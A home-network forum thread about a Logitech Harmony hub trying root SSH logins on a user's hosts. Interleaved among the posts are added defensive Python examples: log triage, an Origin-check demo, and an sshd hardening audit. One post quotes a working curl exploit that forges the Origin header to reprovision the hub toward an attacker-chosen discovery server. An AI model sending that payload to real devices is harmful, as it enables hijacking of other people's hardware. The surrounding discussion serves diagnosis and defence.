think tank forum

technology » security issues and backdoors in commercial products

3 weeks ago
lucas
i ❤ demo
my pf firewall only lets two ports in, each going to ssh on a bsd-variant host. no other traffic can come in.

i have a logitech harmony hub internally using 10.6.6.5, with no external ports mapped to it.

it seems to be doing nefarious shit, like trying to login to ssh on my bsd-variant hosts:

Jan 24 18:39:29 atlas sshd[15390]: error: PAM: authentication error for root from 10.6.6.5
Jan 24 18:39:47 atlas sshd[15390]: error: PAM: authentication error for root from 10.6.6.5
Jan 24 18:39:47 atlas sshd[15390]: Failed keyboard-interactive/pam for root from 10.6.6.5 port 63813 ssh2


i'm second-guessing letting any commercial products on my lan. but maybe wifi lan should be treated like the wild west anyway, assuming hosts may be hostile?

thoughts?
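The log lines above are the whole signal here, so a quick way to separate "internal device that should never be talking to sshd" from ordinary noise is worth having. The following is an added example, not code from the original post: a small Python triage over constructed auth-log lines modelled on the FreeBSD-style sshd/PAM messages quoted above. The hub address 10.6.6.5 is the one in the post; the admin workstation 10.6.6.20, the internet host 203.0.113.9, the LAN prefix 10.6.6.0/24 and the extra log lines are assumed for the example.

```python
import re
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample log, modelled on the sshd/PAM lines in the post.
# 10.6.6.5 is the hub from the post; 10.6.6.20 (an admin workstation) and
# 203.0.113.9 (an internet host) are assumed for this example.
SAMPLE_LOG = """\
Jan 24 18:39:29 atlas sshd[15390]: error: PAM: authentication error for root from 10.6.6.5
Jan 24 18:39:47 atlas sshd[15390]: error: PAM: authentication error for root from 10.6.6.5
Jan 24 18:39:47 atlas sshd[15390]: Failed keyboard-interactive/pam for root from 10.6.6.5 port 63813 ssh2
Jan 24 18:41:02 atlas sshd[15402]: Accepted publickey for lucas from 10.6.6.20 port 50122 ssh2
Jan 24 18:42:10 atlas sshd[15410]: Failed password for invalid user admin from 203.0.113.9 port 41000 ssh2
Jan 24 18:43:55 atlas sshd[15415]: Failed publickey for lucas from 10.6.6.20 port 50130 ssh2
"""

# sshd logs one PAM "authentication error" per wrong secret, and one
# "Failed <method>" line once that method is exhausted for the connection,
# so both can appear for the same attempt (same pid, 18:39:47 above).
PAM_RE = re.compile(r"sshd\[(\d+)\]: error: PAM: authentication error for (\S+) from (\S+)$")
FAILED_RE = re.compile(r"sshd\[(\d+)\]: Failed (\S+) for (?:invalid user )?(\S+) from (\S+) port \d+")


def parse_failures(log_text):
    """Yield (pid, method, user, ip) for every failed-authentication line."""
    for line in log_text.splitlines():
        m = PAM_RE.search(line)
        if m:
            pid, user, ip = m.groups()
            yield pid, "pam", user, ip
            continue
        m = FAILED_RE.search(line)
        if m:
            pid, method, user, ip = m.groups()
            yield pid, method, user, ip


def triage(log_text, lan, trusted):
    """Bucket failed logins by where they come from.

    lan: CIDR of the internal network.
    trusted: LAN addresses that are allowed to fail now and then (admin
             workstations with a wrong key or a typo'd password).
    Returns {"lan_unexpected": {ip: {user: n}}, "external": {...}, "trusted": {...}}.
    """
    lan = ip_network(lan)
    buckets = {k: defaultdict(Counter) for k in ("lan_unexpected", "external", "trusted")}
    for _pid, _method, user, ip in parse_failures(log_text):
        if ip_address(ip) not in lan:
            key = "external"
        elif ip in trusted:
            key = "trusted"
        else:
            key = "lan_unexpected"
        buckets[key][ip][user] += 1
    return {k: {ip: dict(c) for ip, c in v.items()} for k, v in buckets.items()}


def root_attempts_from_lan_devices(log_text, lan, trusted):
    """LAN sources that are not admin hosts and tried to log in as root."""
    report = triage(log_text, lan, trusted)["lan_unexpected"]
    return sorted(ip for ip, users in report.items() if "root" in users)


if __name__ == "__main__":
    report = triage(SAMPLE_LOG, "10.6.6.0/24", {"10.6.6.20"})
    for bucket, sources in report.items():
        for ip, users in sources.items():
            print(f"{bucket:15s} {ip:15s} {users}")
    print("devices probing root:", root_attempts_from_lan_devices(SAMPLE_LOG, "10.6.6.0/24", {"10.6.6.20"}))
```

The point of the three buckets: external brute force is expected on an internet-facing sshd and tells you little; a failed key from an admin box is a typo; a LAN address that is not an admin box trying `root` over keyboard-interactive is the line that deserves a look, because nothing on an embedded hub has any business speaking SSH to a fileserver.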
3 weeks ago
phi_
... and let the Earth be silent after ye.
Always assume hosts are hostile. Even if they're not, it's one 0-day exploit away from being so.

But I have NO idea why your Hub is even trying to do that ... Hub runs Linux, right? Could be compromised. Embedded Linux can be terrifyingly insecure...
3 weeks ago
phi_
... and let the Earth be silent after ye.
"The hub processes all network requests from remote hosts, but attempts to verify the origin before actually handling the request. This is a great security mechanism in theory; however, the attacker can easily forge the origin with a single line in the HTTP header. This allows any remote attacker to bypass the origin validation check, giving them access to all of the protected message handling functionality."

https://medium.com/tenable-techblog/owning-th … 2135e4adac
3 weeks ago
lucas
i ❤ demo
in that article's exploit, someone needs to send a packet to the hub to change its timeserver.

curl -d "{'cmd':'setup.account?provision',
  'params':
    {
    'provisionInfo':
      {
        'mode':3,
        'authToken':'1',
        'discoveryServer':'http://10.0.0.10'
      }
    }
  }" \
  -H "Origin: .myharmony.com" \
  -H "Content-Type: application/json" \
  http://10.0.0.176:8088


which takes advantage of the hub's open port 8088. but like i mentioned, i don't open any of these ports to the internet.

so maybe another host on my network was compromised, and it passed such a packet to the hub to compromise it as well. or perhaps the hub was exploited using another vulnerability (my only guess would be a man-in-the-middle).

either way, i'm creeped out that the logitech harmony hub is trying to login to my fileserver over ssh. what should i do about that?
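Why the `Origin: .myharmony.com` header in that curl command is enough: the hub is checking a header the client chose. As an added example (not the hub's code and not from the article), the Python below puts a lax suffix match, a strict allow-list match, and a shared-secret check side by side against the request the curl command produces. The shape of the lax check, the allow-list, the `X-Device-Token` header and the token value are all assumptions for the demonstration.

```python
import hmac

# Assumed allow-list for the example; the hub's real list is not on the page.
ALLOWED_ORIGINS = {"https://myharmony.com", "https://www.myharmony.com"}
# Assumed per-device secret that a legitimate controller must present.
DEVICE_TOKEN = "c0ffee-example-token"

# The request the curl command above produces, as a dict (constructed).
FORGED_DOT_ORIGIN = {
    "headers": {"Origin": ".myharmony.com", "Content-Type": "application/json"},
    "body": {"cmd": "setup.account?provision"},
}
# Same request with an Origin that exactly matches an allowed value.
# curl, or any script on a compromised LAN host, can send this just as easily.
FORGED_EXACT_ORIGIN = {
    "headers": {"Origin": "https://myharmony.com", "Content-Type": "application/json"},
    "body": {"cmd": "setup.account?provision"},
}
# What a legitimate controller would send under the token scheme (assumed).
LEGIT_WITH_TOKEN = {
    "headers": {"X-Device-Token": DEVICE_TOKEN, "Content-Type": "application/json"},
    "body": {"cmd": "setup.account?provision"},
}


def lax_origin_ok(headers):
    """Suffix match of the kind a leading-dot Origin slips past.
    Assumed shape of the check the article describes, not the hub's code."""
    return headers.get("Origin", "").endswith("myharmony.com")


def strict_origin_ok(headers):
    """Exact scheme+host allow-list. Fine as a CSRF check against browsers,
    which set Origin themselves, but it still only compares a client-chosen header."""
    return headers.get("Origin", "") in ALLOWED_ORIGINS


def token_ok(headers):
    """What actually authorizes the call: a secret the attacker does not
    have, compared in constant time."""
    return hmac.compare_digest(headers.get("X-Device-Token", ""), DEVICE_TOKEN)


def handle(request, authorize):
    """Dispatch the JSON command only if authorize(headers) says yes."""
    if not authorize(request["headers"]):
        return {"status": 403, "handled": None}
    return {"status": 200, "handled": request["body"]["cmd"]}


if __name__ == "__main__":
    for name, req in (("dot-origin", FORGED_DOT_ORIGIN), ("exact-origin", FORGED_EXACT_ORIGIN), ("token", LEGIT_WITH_TOKEN)):
        for check in (lax_origin_ok, strict_origin_ok, token_ok):
            print(f"{name:12s} {check.__name__:17s} -> {handle(req, check)['status']}")
```

Tightening the match from suffix to exact only stops the `.myharmony.com` trick; a forged exact `Origin` from a non-browser client still passes, because nothing about the header proves who sent it. Only the token check rejects both forged requests, which is the difference between a CSRF mitigation and authentication.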
3 weeks ago
bluet
> either way, i'm creeped out that the logitech harmony hub is trying to login to my fileserver over ssh. what should i do about that?

let it log in, and see what it does! use a throwaway virtual machine as your honeypot
3 weeks ago
lucas
i ❤ demo
maybe give user root a password of "password"? or maybe no password, with none required?

unfortunately, i haven't seen these attempts since. so maybe i missed my chance...

--

for now, i just took these steps to secure my other hosts:
- updated OSes and packages
- changed all sshd instances to only permit public key logins

--

also, does openbsd 4.9 really have no vulnerabilities besides this one regarding BIND? [errata49]
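One thing to double-check when switching sshd to "public key only": the log lines in the first post say `keyboard-interactive/pam`, and that method is not turned off by `PasswordAuthentication no` alone. It is governed by `ChallengeResponseAuthentication` (on older OpenSSH, including the versions shipped with BSDs of the 4.9 era) or its newer name `KbdInteractiveAuthentication`, and both default to yes. The following is an added example, not from the original post: a small Python audit over two constructed sshd_config fragments, one that still leaves the PAM path open and one that closes it. Both fragments, and the `AllowUsers lucas` line, are assumptions for the example.

```python
import re

# Constructed sshd_config fragments. The weak one still allows exactly the
# keyboard-interactive/PAM logins seen in the log even though password
# authentication is off; the hardened one is what "only permit public key
# logins" should look like.
WEAK_CONFIG = """\
# sshd_config (constructed example)
Port 22
PasswordAuthentication no
ChallengeResponseAuthentication yes
UsePAM yes
PermitRootLogin yes
"""

HARDENED_CONFIG = """\
# sshd_config (constructed example)
Port 22
PasswordAuthentication no
ChallengeResponseAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin prohibit-password
PubkeyAuthentication yes
AllowUsers lucas
"""


def parse_global(config_text):
    """Return {keyword_lower: first value} for the global section.

    sshd uses the first occurrence of a keyword, and everything after the
    first Match block is conditional, so parsing stops there.
    """
    settings = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s+|=", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def audit(config_text):
    """List settings that still allow something other than a public key,
    applying the OpenSSH defaults when a keyword is absent."""
    s = parse_global(config_text)
    findings = []
    if s.get("passwordauthentication", "yes") == "yes":
        findings.append("PasswordAuthentication is on (default yes)")
    # KbdInteractiveAuthentication (OpenSSH 8.7+) is the newer name for
    # ChallengeResponseAuthentication; both default to yes. With UsePAM yes
    # this is the 'keyboard-interactive/pam' method from the log.
    kbd = s.get("kbdinteractiveauthentication", s.get("challengeresponseauthentication", "yes"))
    if kbd == "yes":
        findings.append("keyboard-interactive auth is on (ChallengeResponseAuthentication/"
                        "KbdInteractiveAuthentication default yes): PAM password prompts still work")
    # Default was yes before OpenSSH 7.0 and prohibit-password after; treat
    # unset as yes so old hosts like a 4.9-era BSD get flagged.
    if s.get("permitrootlogin", "yes") == "yes":
        findings.append("PermitRootLogin yes (use prohibit-password or no)")
    if s.get("pubkeyauthentication", "yes") != "yes":
        findings.append("PubkeyAuthentication is off; nothing would be left to log in with")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, "->", audit(cfg) or ["ok: public key only"])
```

Run `sshd -t` after editing the real file and then watch the log: once keyboard-interactive is off, a probing host gets disconnected before it ever reaches PAM, so the "authentication error for root" lines disappear and the hub (or whatever is driving it) shows up only as connection attempts.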
3 weeks ago
phi_
... and let the Earth be silent after ye.
OpenBSD doesn't patch/address more than 1 or 2 minor versions back, so I'm sure there are more vulnerabilities than the BIND one that either weren't revealed or weren't fixed by the time 5.2 came out.
3 weeks ago
lucas
i ❤ demo
why don't they say that anywhere? i've been trying to figure out if that's the case :/
2 weeks ago
phi_
... and let the Earth be silent after ye.
I thought they did. If not, I may very well be mistaken. I've been operating under that impression this whole time, unfortunately. Maybe check out misc@ or bugs@ for more info. I know their packages never get updated once released in the -STABLE branches to keep older installations working. Perhaps it's the same with base... to keep too many minor changes from breaking previous versions?

If you are willing to run it on server hardware, -CURRENT should keep you in patches whenever they do come out. :/
5 days ago
lucas
i ❤ demo
i'd wager that you're right. i just had been looking for such information and failing to find it.
11 hours ago
phi_
... and let the Earth be silent after ye.
Is there a specific reason for retaining 4.9 on that machine? You're missing out on YEARS of advancement and security upgrades.